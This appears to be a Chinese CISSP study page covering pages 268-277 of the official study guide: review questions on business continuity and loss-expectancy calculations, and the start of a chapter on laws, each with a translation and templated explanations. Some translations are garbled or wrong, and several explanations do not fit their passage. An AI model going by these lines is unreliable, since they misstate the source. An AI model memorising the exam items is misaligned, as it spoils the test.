你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

业务连续性计划 BCP:BCP 关注业务在灾难或中断中如何继续运行。

常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 268 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

BCP 保护业务流程,DRP 保护 IT 恢复。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
业务连续性计划 BCP BCP 关注业务在灾难或中断中如何继续运行。
学习单元 37 / PDF P269

第 269 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

C. MTD D. ARO 8. You are concerned about the risk that an avalanche poses to your $3 million shipping facility. Based on expert opinion, you determine that there is a 5 percent chance that an avalanche will occur each year. Experts advise you that an avalanche would completely destroy your building and require you to rebuild on the same land. Ninety percent of the $3 million value of the facility is attributed to the building, and 10 percent is attributed to the land itself. What is the single loss expectancy (SLE) of your shipping facility to avalanches? A. $3 million B. $2,700,000 C. $270,000 D. $135,000 9. Referring to the scenario in question 8, what is the annualized loss expectancy? A.

$3 million B. $2,700,000 C. $270,000 D. $135,000 10. You are concerned about the risk that a hurricane poses to your corporate headquarters in South Florida. The building itself is valued at $15 million. After consulting with the National Weather Service, you determine that there is a 10 percent likelihood that a hurricane will strike over the course of a year. You hired a team of architects and engineers, who determined that the average hurricane would destroy approximately 50 percent of the building. What is the annualized loss expectancy (ALE)? A. $750,000 B. $1.5 million C. $7.5 million D. $15 million C. MTD D. ARO 8.

中文直译 / 整理

您担心雪崩对您价值300万美元的货运设施构成的风险。 根据专家意见, 您确定每年发生雪崩的概率为5%。 专家建议您,雪崩将完全摧毁您的建筑 物,并要求您在原地重建。 该设施300万美元价值的90%归因于建筑物,10 %归因于土地本身。 您的货运设施因雪崩造成的单次损失预期(SLE)是多 少? A. 300万美元 B. 2,700,000美元 C. 270,000美元 D. 135,000美元 9. 参考第8题的情景,年化预期损失是多少? A. 300万美元 B. 270万美元 C. 27万美元 D. 13.5万美元 10. 您担心飓风对位于南佛罗里达州的公司总部构成的风险。 该建筑价值1 500万美元。 在咨询国家气象局后,您确定一年内发生飓风的概率为10%。 您 聘请了一支建筑师和工程师团队, 谁确定了平均 g飓风会摧毁 y app大约 50%的建筑物。 年化损失预期是多少 (ALE)? A. $750,000 B. $1.5 million C. $7.5 million D. $15 million

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 269 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 38 / PDF P270

第 270 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

11. Chris is completing the risk acceptance documentation for his organization's business continuity plan. Which one of the following items is Chris least likely to include in this documentation? A. Listing of risks deemed acceptable B. Listing of future events that might warrant reconsideration of risk acceptance decisions C. Risk mitigation controls put in place to address acceptable risks D. Rationale for determining that risks were acceptable 12. Brian is developing continuity plan provisions and processes for his organization. What resource should he protect as the highest priority in those plans? A. Physical plant B. Infrastructure C. Financial D. People 13.

Ricky is conducting the quantitative portion of his organization's business impact analysis. Which one of the following concerns is least suitable for quantitative measurement during this assessment? A. Loss of a plant B. Damage to a vehicle C. Negative publicity D. Power outage 14. Lighter than Air Industries expects that it would lose $10 million if a tornado struck its aircraft operations facility. It expects that a tornado might strike the facility once every 100 years. What is the single loss expectancy for this scenario? A. 0.01 B. $10 million C. $100,000 D. 0.10 11.

中文直译 / 整理

克里斯正在为其组织的业务连续性计划完成风险接受文档。 以下哪 一项是克里斯最不可能包含在该文档中的内容? A. 已被认定为可接受的风险列表 B. 可能需要重新考虑风险接受决策的未来事件列表 C. 为应对可接受风险而实施的风险缓解控制措施 D. 确定风险可接受的理由 12. 布莱恩正在为其组织开发连续性计划的条款和流程。 在这些计划中,他 应将哪种资源作为最高优先级进行保护? A. 物理设施 B. 基础设施 C. 财务 D. 人员 13. Ricky 正在进行其组织的定量部分 商业即时通讯 pact anal ysis。 以下哪一项 g 关注点是 最少 在本次评估中适合进行定量测量? A. 植物的损失 B. 车辆的损坏 C. 负面宣传 D. 停电 14. 轻于空气工业公司预计,如果龙卷风袭击其飞机运营设施,将损失 1000万美元。 该公司预计龙卷风可能每100年袭击一次该设施。 此情景的 单次损失预期是多少? A. 0.01 B. 1000万美元 C. 10万美元 D. 0.10

小白解释

场景先行:你是公司的安全负责人,正在读第 270 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

如果这一页没有明显术语,就按“谁在做事、保护什么、怕什么、用什么控制、留下什么证据”来拆。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 270 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解

本页没有识别到重点术语,按原文顺序理解即可。

学习单元 39 / PDF P271

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

15. Referring to the scenario in question 14, what is the annualized loss expectancy? A. 0.01 B. $10 million C. $100,000 D. 0.10 16. In which business continuity planning task would you actually design procedures and mechanisms to mitigate risks deemed unacceptable by the BCP team? A. Strategy development B. Business impact analysis C. Provisions and processes D. Resource prioritization 17. Matt is supervising the installation of redundant communications links in response to a finding during his organization's BIA. What type of mitigation provision is Matt overseeing? A. Hardening systems B. Defining systems C. Reducing systems D. Alternative systems 18.

Helen is working on her organization's resilience plans, and her manager asks her whether the organization has sufficient technical controls in place to recover operations after a disruption. What type of plan would address the technical controls associated with alternate processing facilities, backups, and fault tolerance? A. Business continuity plan B. Business impact analysis C. Disaster recovery plan D. Vulnerability assessment 19. Darren is concerned about the risk of a serious power outage affecting his organization's data center. He consults the organization's business 15.

中文直译 / 整理

参考第14题的情景,年化预期损失是多少? A. 0.01 B. 1000万美元 C. 10万美元 D. 0.10 16. 在业务连续性规划的哪项任务中,您将实际设计程序和机制以缓解 BCP团队认为不可接受的风险? A. 战略制定 B. 业务影响分析 C. 措施与流程 D. 资源优先级排序 17. 马特正在监督冗余通信链路的安装,以应对其组织在BIA中发现的问题。 马特正在监督哪种类型的缓解措施? A. 系统加固 B. 定义系统 C. 减少系统 D. 替代系统 18. 海伦正在为其组织的韧性计划开展工作,她的经理询问她,组织是否已具 备足够的技术控制措施,以在中断后恢复运营。 哪种类型的计划会涉及与备用 处理设施、备份和容错相关的技术控制? A. 业务连续性计划 B. 业务影响分析 C. 灾难恢复计划 D. 漏洞评估 19. 达伦担心严重停电会影响其组织的数据中心。 他咨询了组织的业务

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

漏洞评估:漏洞评估偏技术扫描,主要找已知弱点。

程序:程序是一步一步怎么做。

业务连续性计划 BCP:BCP 关注业务在灾难或中断中如何继续运行。

常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

自动化扫描、已知弱点、补洞通常对应 vulnerability assessment。

Step-by-step、SOP 常对应 procedure。

BCP 保护业务流程,DRP 保护 IT 恢复。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
漏洞评估 漏洞评估偏技术扫描,主要找已知弱点。
程序 程序是一步一步怎么做。
业务连续性计划 BCP BCP 关注业务在灾难或中断中如何继续运行。
学习单元 40 / PDF P272

第 272 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

impact analysis and determines that the ARO of a power outage is 20 percent. He notes that the assessment took place three years ago, and no power outage has occurred. What ARO should he use in this year's assessment, assuming that none of the circumstances underlying the analysis have changed? A. 20 percent B. 50 percent C. 75 percent D. 100 percent 20. Of the individuals listed, who would provide the best endorsement for a business continuity plan's statement of importance? A. Vice president of business operations B. Chief information officer C. Chief executive officer D. Business continuity manager

中文直译 / 整理

影响分析得出,停电的ARO为20%。 他指出,该评估发生在三年前,且尚 未发生过停电。 在本次年度评估中,假设分析所依据的条件未发生任何变 化,他应使用怎样的ARO? A. 20% B. 50% C. 75% D. 100% 20. 在所列人员中,谁最适合为业务连续性计划的重要性声明提供背书? A. 业务运营副总裁 B. 首席信息官 C. 首席执行官 D. 业务连续性经理

小白解释

场景先行:你是公司的安全负责人,正在读第 272 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

如果这一页没有明显术语,就按“谁在做事、保护什么、怕什么、用什么控制、留下什么证据”来拆。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 272 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解

本页没有识别到重点术语,按原文顺序理解即可。

第 4 章 · P273-322 · 50 个学习单元

法律、法规与合规

OSG10 · Chapter 4 · Laws, Regulations, and Compliance · 全文覆盖 + 小白精读 + 画报

第 4 章:法律、法规与合规

这不是提炼版。本页按 PDF 第 273-322 页连续覆盖第 4 章内容,每个学习单元都包含教材原文段落、PDF 中文直译/整理、小白解释、考点提醒和对应画报。

50个连续学习单元
4格原文 / 直译 / 解释 / 考点
50页覆盖第4章正文与章末练习
小白先讲人话,再做题
学习单元 01 / PDF P273

本章考试范围总览

先知道本章会覆盖哪些考试目标,后面每个概念才知道放在哪个知识域。

教材原文段落

Chapter 4 Laws, Regulations, and Compliance THE CISSP TOPICS COVERED IN THIS CHAPTER INCLUDE: Domain 1.0: Security and Risk Management 1.4 Understand legal, regulatory, and compliance issues that pertain to information security in a holistic context 1.4.1 Cybercrimes and data breaches 1.4.2 Licensing and Intellectual Property requirements 1.4.3 Import/export controls 1.4.4 Transborder data flow 1.4.5 Issues related to privacy (e.g., General Data Protection Regulation (GDPR), California Consumer Privacy Act, Personal Information Protection Law, Protection of Personal Information Act) 1.4.6 Contractual, legal, industry standards, and regulatory requirements The world of compliance is a complex and dynamic landscape of legal and regulatory matters for information technology and cybersecurity professionals.

National, state, and local governments have all passed overlapping laws regulating different components of cybersecurity in a patchwork manner. This leads to an incredibly confusing landscape for security professionals, who must reconcile the laws of multiple jurisdictions. Things become even more complicated for multinational companies, which must navigate the variations between international laws as well. Law enforcement agencies have tackled the issue of cybercrime with gusto in recent years. The legislative branches of governments around the world have at least attempted to address issues of cybercrime.

Many law enforcement agencies have full-time, well-trained computer crime investigators with

中文直译 / 整理

第4章 法律、法规与合规 本章涵盖的CISSP主题包括: 领域1.0:安全与风险管理 1.4 从整体角度理解与信息安全相关的法律、法规和合规问题 1.4.1 网络犯罪和数据泄露 1.4.2 许可和知识产权要求 1.4.3 进出口管制 1.4.4 跨境数据流动 1.4.5 与隐私相关的问题(例如,《通用数据保护条例》( GDPR)、《加州消费者隐私法》、《个人信息保护法》、 《个人信息保护法》) 1.4.6 合同、法律、行业标准和监管要求 合规领域是一个复杂且动态的法律与监管环境,针对信息技术和网络安全专业 人员。 国家、州和地方政府已相继通过了重叠的法律,以碎片化的方式规范网 络安全的各个组成部分。 这导致安全专业人员面临极其混乱的环境,必须协调 多个司法管辖区的法律。 对于跨国公司而言,情况更加复杂,因为它们还必须 应对国际法律之间的差异。 近年来,执法机构以极大的热情应对网络犯罪问题。 世界各国的立法机构至少 已尝试解决网络犯罪问题。 许多执法机构配备了全职且经过良好训练的计算机 犯罪调查人员,

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:先知道本章会覆盖哪些考试目标,后面每个概念才知道放在哪个知识域。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

标准:标准给出必须满足的最低要求。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“本章考试范围总览”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Minimum level、mandatory requirement 常对应 standard。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
标准 标准给出必须满足的最低要求。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 02 / PDF P274

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

advanced security training. Agencies without full-time investigators should know where to turn when they require this sort of experience. In this chapter, we'll cover the various types of laws that deal with computer security issues. We'll examine the legal issues surrounding computer crime, privacy, intellectual property, and a number of other related topics. We'll also cover basic investigative techniques, including the pros and cons of calling in assistance from law enforcement. Categories of Laws Three main categories of laws play a role in the U.S. legal system.

Each is used to cover a variety of circumstances, and the penalties for violating laws in the different categories vary widely. In the following sections, you'll learn how criminal law, civil law, and administrative law interact to form the complex web of our justice system. Criminal Law Criminal law forms the bedrock of the body of laws that preserve the peace and keep our society safe. Many high-profile court cases involve matters of criminal law; these are the laws that the police and other law enforcement agencies concern themselves with. Criminal law contains prohibitions against acts such as murder, assault, robbery, and arson.

Penalties for violating criminal statutes fall in a range that includes mandatory hours of community service, monetary penalties in the form of fines (small and large), and deprivation of civil liberties in the form of prison sentences.

中文直译 / 整理

具备高级安全培训。 没有全职调查人员的机构应了解在需要此类经验时应向何处 寻求帮助。 在本章中,我们将介绍涉及计算机安全问题的各种法律。 我们将探讨与计算机 犯罪、隐私、知识产权以及其他相关主题相关的法律问题。 我们还将介绍基本 的调查技术,包括寻求执法部门协助的利与弊。 法律的类别 在美国法律体系中,主要有三类法律发挥着作用。 每类法律适用于各种不同 的情形,违反不同类别法律所面临的处罚也大不相同。 在以下章节中,您将 了解刑法、民法和行政法如何相互作用,构成我们司法体系的复杂网络。 刑法 刑法是维护和平、保障社会安全的法律体系的基石。 许多备受关注的法庭案件 都涉及刑法问题; 这些正是警察及其他执法机构所关注的法律。 刑法禁止诸如 谋杀、袭击、抢劫和纵火等行为。 违反刑法规定的处罚包括强制社区服务时长、 以罚款形式(小额和大额)施加的经济处罚,以及以监禁形式剥夺公民自由。

小白解释

场景先行:你是公司的安全负责人,正在读第 274 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

NIST:NIST 提供美国常用安全标准、框架和指南。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

ISO 偏标准和管理体系。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
NIST NIST 提供美国常用安全标准、框架和指南。
学习单元 03 / PDF P275

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Don't Underestimate Technology Crime Investigators A good friend of one of the authors is a technology crime investigator for the local police department. He often receives cases of computer abuse involving threatening emails and website postings. Recently, he shared a story about a bomb threat that had been emailed to a local high school. The perpetrator sent a threatening note to the school principal declaring that the bomb would explode at 1 p.m. and warning him to evacuate the school. The author's friend received the alert at 11 a.m., leaving him with only two hours to investigate the crime and advise the principal on the best course of action.

He quickly began issuing emergency subpoenas to internet service providers and traced the email to a computer in the school library. At 12:15 p.m., he confronted the suspect with surveillance tapes showing him at the computer in the library as well as audit logs conclusively proving that he had sent the email. The student quickly admitted that the threat was nothing more than a ploy to get out of school a couple of hours early. His explanation? “I didn't think there was anyone around here who could trace stuff like that.” He was wrong. A number of criminal laws serve to protect society against computer crime.

In later sections of this chapter, you'll learn how some laws, such as the Computer Fraud and Abuse Act (CFAA), the Electronic Communications Privacy Act (ECPA), and the Identity Theft and Assumption Deterrence Act (ITADA) (among others), provide criminal penalties for serious cases of computer crime. Technically savvy prosecutors teamed with concerned law enforcement agencies have dealt serious blows to the “hacking underground” by using the court system to slap lengthy prison terms on offenders guilty of what used to be considered harmless pranks. In the United States, legislative bodies at all levels of government establish criminal laws through elected representatives.

At the federal level, both the

中文直译 / 整理

不要低估技术犯罪调查人员 其中一位作者的好友是当地警察局的技术犯罪调查员。 他经常处理涉及威 胁性电子邮件和网站发帖的计算机滥用案件。 最近,他分享了一个关于有人通过电子邮件向当地一所高中发出炸弹威胁 的故事。 作案者向学校校长发送了一封威胁信,声称炸弹将在下午1点爆炸, 并警告他立即疏散学校。 作者的朋友在上午11点收到了警报,仅有两小时 时间调查此案,并向校长提供最佳应对建议。 他迅速向互联网服务提供商发出紧急传票,并追踪到该邮件来自学校图书 馆的一台电脑。 中午12点15分,他手持监控录像和明确证明该学生发送了 邮件的审计日志,当面质问嫌疑人。 这名学生很快承认,这一威胁不过是 想提前几个小时逃课的伎俩。 他的解释是:‘我以为这里没人能追踪到这 种事。 ’ 他错了。 多项刑事法律旨在保护社会免受计算机犯罪的侵害。 在本章的后续部分,您将 了解某些法律,例如《计算机欺诈与滥用法》(CFAA)、《电子通信隐私法》 (ECPA)和《身份盗窃与欺诈威慑法》(ITADA)(以及其他法律),如何 对严重的计算机犯罪行为施加刑事处罚。

技术娴熟的检察官与关注此事的执法 机构联手,通过法院系统对那些曾被视为无害恶作剧的罪犯判处长期监禁,给 “黑客地下世界”造成了沉重打击。 在美国,各级政府的立法机构通过民选代表制定刑法。 在联邦层面,

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

审计:审计记录主体行为,用于追责、复盘和取证。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

身份:身份是主体在系统中的标识。

审计:审计检查控制是否存在、是否有效、是否符合要求。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

没有日志和身份绑定,就很难问责。

ISO 偏标准和管理体系。

身份管理题要区分识别、认证、授权、审计。

审计题关注独立性、证据、范围和报告。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
审计 审计记录主体行为,用于追责、复盘和取证。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
身份 身份是主体在系统中的标识。
审计 审计检查控制是否存在、是否有效、是否符合要求。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 04 / PDF P276

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

House of Representatives and the Senate must pass criminal law bills by a majority vote (in most cases), and then the president must normally sign it in order for the bill to become law. Once passed, these laws then become federal law and apply in all cases where the federal government has jurisdiction (mainly cases that involve interstate commerce, cases that cross state boundaries, or cases that are offenses against the federal government itself). If federal jurisdiction does not apply, state authorities handle the case using laws passed in a similar manner by state legislators. All federal and state laws must comply with the ultimate authority that dictates how the U.S.

system of government works—the U.S. Constitution. All laws are subject to judicial review by regional courts with the right of appeal all the way to the Supreme Court of the United States. If a court finds that a law is unconstitutional, it has the power to strike it down and render it invalid. Keep in mind that criminal law is a serious matter. If you find yourself involved—as a witness, defendant, or victim—in a matter where criminal authorities become involved, you'd be well advised to seek advice from an attorney familiar with the criminal justice system and specifically with matters of computer crime. It's not wise to “go it alone” in such a complex system.

Civil Law Civil laws form the bulk of the U.S. body of laws. They are designed to provide for an orderly society and govern matters that are not crimes but that require an impartial arbiter to settle between individuals and organizations. Examples of the types of matters that may be judged under civil law include contract disputes, real estate transactions, employment matters, and estate/probate procedures. Civil laws also are used to create the framework of government that the executive branch uses to carry out its responsibilities.

These laws provide budgets for governmental activities and lay out the authority granted to the executive branch to create administrative laws (see the next section). Civil laws are enacted in the same manner as criminal laws. They must pass through the legislative process before enactment and are subject to the same constitutional parameters and judicial review procedures. At the federal level, both criminal and civil laws are embodied in the United States Code (USC).

中文直译 / 整理

众议院和参议院必须以多数票通过刑法法案(大多数情况下),然后总统通常 必须签署该法案,法案才能成为法律。 一旦通过,这些法律即成为联邦法律, 适用于联邦政府拥有管辖权的所有案件(主要是涉及州际贸易、跨越州界或违 反联邦政府本身的行为的案件)。 如果联邦管辖权不适用,则州当局将使用州 立法机构以类似方式通过的法律处理案件。 所有联邦和州法律都必须遵守最终权威——美国宪法,它规定了美国政府体系 的运作方式。 所有法律均受地区法院的司法审查,并可上诉至美国最高法院。 如果法院认定某项法律违宪,则有权将其废除并宣告其无效。 请记住,刑法是一项严肃的事务。 如果您以证人、被告或受害者身份卷入 涉及刑事当局的事件,强烈建议您咨询熟悉刑事司法系统、特别是计算机 犯罪相关事务的律师。 在如此复杂的体系中,独自应对是不明智的。 民法 民法构成了美国法律体系的主体。 其目的在于维护有序的社会,规范不属于犯 罪但需要中立仲裁者来解决个人与组织之间争议的事务。 民法适用的事项包括 合同纠纷、房地产交易、雇佣事务以及遗产/遗嘱认证程序。 民法还用于构建政 府框架,使行政部门能够履行其职责。

这些法律为政府活动提供预算,并明确 授予行政部门制定行政法规的权力(见下一节)。 民法以与刑法相同的方式制定。 它们必须经过立法程序才能生效,并受相同的 宪法限制和司法审查程序约束。 在联邦层面,刑法和民法均体现在《美国法典》 (USC)中。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

NIST:NIST 提供美国常用安全标准、框架和指南。

程序:程序是一步一步怎么做。

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
身份 身份是主体在系统中的标识。
学习单元 05 / PDF P277

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

The major difference between civil laws and criminal laws is the way in which they are enforced. Usually, law enforcement authorities do not become involved in matters of civil law beyond taking action necessary to restore order. In a criminal prosecution, the government, through law enforcement investigators and prosecutors, brings action against a person accused of a crime. In civil matters, it is incumbent upon the person who thinks they have been wronged to obtain legal counsel and file a civil lawsuit against the person they think is responsible for their grievance.

The government (unless it is the plaintiff or defendant) does not take sides in the dispute or argue one position or the other. The only role of the government in civil matters is to provide the judges, juries, and court facilities used to hear civil cases and to play an administrative role in managing the judicial system in accordance with the law. As with criminal law, it is best to obtain legal assistance if you think you need to file a civil lawsuit or if someone files a civil lawsuit against you. Although civil law does not impose the threat of imprisonment, the losing party may face severe financial penalties.

You don't need to look any further than the daily news for examples—multimillion-dollar cases against tobacco companies, major corporations, and wealthy individuals are filed every day. Administrative Law The executive branch of the U.S. government charges numerous agencies with wide-ranging responsibilities to ensure that government functions effectively. It is the duty of these agencies to abide by and enforce the criminal and civil laws enacted by the legislative branch. However, as can be easily imagined, criminal and civil law can't possibly lay out rules and procedures that should be followed in every possible situation.

Therefore, executive branch agencies have some leeway to enact administrative law, in the form of executive orders, policies, procedures, and regulations that govern the daily operations of the agency. Administrative law covers topics as mundane as the procedures to be used within a federal agency to obtain a desk telephone to more substantial issues such as the immigration policies that will be used to enforce the laws passed by Congress. Administrative law is published in the Code of Federal Regulations (CFR). Although administrative law does not require an act of the legislative branch to gain the force of law, it must comply with all existing civil and criminal laws.

